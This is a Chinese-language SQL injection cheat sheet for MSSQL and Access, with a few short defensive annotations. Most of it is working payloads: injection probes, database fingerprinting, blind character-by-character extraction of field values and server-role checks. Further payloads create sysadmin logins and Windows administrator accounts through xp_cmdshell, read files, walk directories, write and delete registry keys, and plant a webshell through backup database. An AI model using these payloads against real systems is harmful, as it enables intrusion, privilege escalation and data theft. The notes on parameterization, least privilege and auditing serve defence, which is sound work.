1.判断是否有注入;and 1=1 ;and 1=2
2.初步判断是否是mssql ;and user>0
3.注入参数是字符'and [查询条件] and ''='
4.搜索时没过滤参数的'and [查询条件] and '%25'='
注:以上探测之所以能得到不同的返回,是因为参数被直接拼接进了SQL语句;改用参数化查询后,这些附加条件只会被当作普通数据处理。
5.判断数据库系统
;and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0 access
6.猜数据库 ;and (select Count(*) from [数据库名])>0
7.猜字段 ;and (select Count(字段名) from 数据库名)>0
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0
9.(1)猜字段的ascii值(access)
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0
(2)猜字段的ascii值(mssql)
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0
10.测试权限结构(mssql)
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
;and 1=(select IS_MEMBER('db_owner'));--
注:Web应用的数据库帐户不应属于上述任何服务器角色或db_owner;按最小权限配置后,这些检查都应返回0。
11.添加mssql和系统的帐户
;exec master.dbo.sp_addlogin username;--
;exec master.dbo.sp_password null,username,password;--
;exec master.dbo.sp_addsrvrolemember sysadmin username;--
;exec master.dbo.xp_cmdshell 'net user username password /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';--
;exec master.dbo.xp_cmdshell 'net user username password /add';--
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--
注:xp_cmdshell 自 SQL Server 2005 起默认禁用,且默认只有 sysadmin 成员可以执行;防御上应保持其禁用,并对该选项被启用、新增登录名以及 sysadmin 角色成员变更进行审计告警。
12.(1)遍历目录
;create table dirs(paths varchar(100), id int)
;insert dirs exec master.dbo.xp_dirtree 'c:\'
;and (select top 1 paths from dirs)>0
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>)
(2)遍历目录
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树结构
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容
13.mssql中的存储过程
xp_regenumvalues 注册表根键, 子键
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值
xp_regread 根键,子键,键值名
;exec xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回指定键的值
xp_regwrite 根键,子键, 值名, 值类型, 值
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表
xp_regdeletevalue 根键,子键,值名
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值
注:xp_reg* 系列为未公开文档的扩展存储过程,应审计其调用,并确保应用帐户不具备执行注册表写入、删除类过程的权限。
14.mssql的backup创建webshell
use model
create table cmd(str image);
insert into cmd(str) values ('');
backup database model to disk='c:\l.asp';
注:该方法要求当前帐户有权执行 backup database,并且 SQL Server 服务帐户对 Web 目录有写权限;将数据库与 Web 服务器分离、禁止服务帐户写入 Web 目录即可使其失效。
15.mssql内置函数
;and (select @@version)>0 获得Windows的版本号
;and user_name()='dbo' 判断当前系统的连接用户是不是sa
;and (select user_name())>0 爆当前系统的连接用户
;and (select db_name())>0 得到当前连接的数据库
注:带 >0 的几条语句依靠类型转换错误把字符串值显示在报错信息中;应用不向客户端返回数据库错误详情时,这一回显途径即失效(但并不能消除注入本身)。另外 @@version 返回的是 SQL Server 版本及其所在操作系统的信息。
16.简洁的webshell
use model
create table cmd(str image);
insert into cmd(str) values ('');
backup database model to disk='g:\wwwtest\l.asp';
注:检测上可关注备份文件被写到 Web 目录或使用脚本扩展名(如 .asp)的 backup database 操作。